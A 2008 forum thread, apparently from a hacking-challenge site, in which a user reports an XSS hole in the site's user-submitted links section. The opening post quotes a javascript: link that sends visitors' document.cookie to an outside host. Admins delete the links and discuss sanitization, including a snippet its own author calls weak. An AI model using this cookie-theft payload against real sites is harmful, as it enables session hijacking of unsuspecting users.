Links section
Global Rank: 172
Totalscore: 115512
Posts: 166
Thanks: 164
UpVotes: 121
Registered: 16y 274d
Last Seen: 1y 84d
The User is Offline
Links section
Apr 23, 2008 - 16:25:58 (16y 217d)
Apr 23, 2008 - 16:25:58 (16y 217d)
javascript:document.location="http://osmosis.ath.cx/~mals/mals/o.php?o="+document.cookie
Hmm, does not look good...
Hmm, does not look good...
Global Rank: 229
Totalscore: 93264
Posts: 1680
Thanks: 1358
UpVotes: 920
Registered: 16y 282d
Last Seen: 10h 34m
The User is Offline
Links section
Apr 23, 2008 - 16:48:03 (16y 217d)
Apr 23, 2008 - 16:48:03 (16y 217d)
Thanks for alerting us.
I deleted the harmful links.
Currently i have no idea how to sanitize submitted links properly.
Maybe we should add some <noscript> tags for links section ?
@mals: Thanks for finding a real security problem
I deleted the harmful links.
Currently i have no idea how to sanitize submitted links properly.
Maybe we should add some <noscript> tags for links section ?
@mals: Thanks for finding a real security problem
The geeks shall inherit the properties and methods of object earth.
Global Rank: 440
Totalscore: 55756
Posts: 34
Thanks: 39
UpVotes: 18
Registered: 16y 278d
Last Seen: 14y 265d
The User is Offline
Links section
Apr 23, 2008 - 17:09:46 (16y 217d)
Apr 23, 2008 - 17:09:46 (16y 217d)
Links should be validated by admins first.
Global Rank: 73
Totalscore: 213033
Posts: 148
Thanks: 206
UpVotes: 108
Registered: 16y 281d
Last Seen: 2y 252d
The User is Offline
Links section
Apr 23, 2008 - 19:48:57 (16y 217d)
Apr 23, 2008 - 19:48:57 (16y 217d)
I agree with theAnswer.
What's to stop people from adding tons of ad-links?
What's to stop people from adding tons of ad-links?
Global Rank: 229
Totalscore: 93264
Posts: 1680
Thanks: 1358
UpVotes: 920
Registered: 16y 282d
Last Seen: 10h 34m
The User is Offline
Links section
Apr 23, 2008 - 20:16:23 (16y 217d)
Apr 23, 2008 - 20:16:23 (16y 217d)
The amount of links you can add depends on your totalscore.
how about this snippet to prevent xss in links ?
My guess is that this would only make it slightly harder to exploit.
how about this snippet to prevent xss in links ?
GeSHi`ed Plaintext code
1
2
3
4
56
|
$url = str_replace("http://", "", $url);
if (strpos($url, "://") !== false) {
return htmlDisplayError("only valid links please.");
}
|
My guess is that this would only make it slightly harder to exploit.
The geeks shall inherit the properties and methods of object earth.
Global Rank: 29991
Totalscore: 0
Posts: 265
Thanks: 243
UpVotes: 180
Registered: 25y 3h
Last Seen: 0s
The User is Online
Links section
Apr 24, 2008 - 13:10:23 (16y 216d)
Apr 24, 2008 - 13:10:23 (16y 216d)
stop trying to be funny.
Global Rank: 172
Totalscore: 115512
Posts: 166
Thanks: 164
UpVotes: 121
Registered: 16y 274d
Last Seen: 1y 84d
The User is Offline
Links section
Apr 24, 2008 - 13:46:21 (16y 216d)
Apr 24, 2008 - 13:46:21 (16y 216d)
There are tons of solutions on the net, but this one looks short and good enough:
http://svn.bitflux.ch/repos/public/popoon/trunk/classes/externalinput.php
http://svn.bitflux.ch/repos/public/popoon/trunk/classes/externalinput.php
Global Rank: 54
Totalscore: 255341
Posts: 156
Thanks: 132
UpVotes: 163
Registered: 16y 280d
Last Seen: 14d 16h
The User is Offline
Links section
Apr 24, 2008 - 15:50:04 (16y 216d)
Apr 24, 2008 - 15:50:04 (16y 216d)
Maybe checkout the W3C specification for URL. I bet u'll find a regex for it.
Global Rank: 172
Totalscore: 115512
Posts: 166
Thanks: 164
UpVotes: 121
Registered: 16y 274d
Last Seen: 1y 84d
The User is Offline
Links section
Apr 24, 2008 - 16:10:19 (16y 216d)
Apr 24, 2008 - 16:10:19 (16y 216d)
I think regex is not a good way, because nothing ensures that a valid url doesnt contain an evil payload. This statement is only theoretical, but true.
Lessons learned: preventing xss is a hard nut...
Lessons learned: preventing xss is a hard nut...
tunelko, quangntenemy, TheHiveMind, Z, balicocat, Ge0, samuraiblanco, arraez, jcquinterov, hophuocthinh, alfamen2, burhanudinn123, Ben_Dover, stephanduran89, braddie0, SwolloW, dangarbri, csuquvq have subscribed to this thread and receive emails on new posts.
1 people are watching the thread at the moment.
This thread has been viewed 2998 times.
1 people are watching the thread at the moment.
This thread has been viewed 2998 times.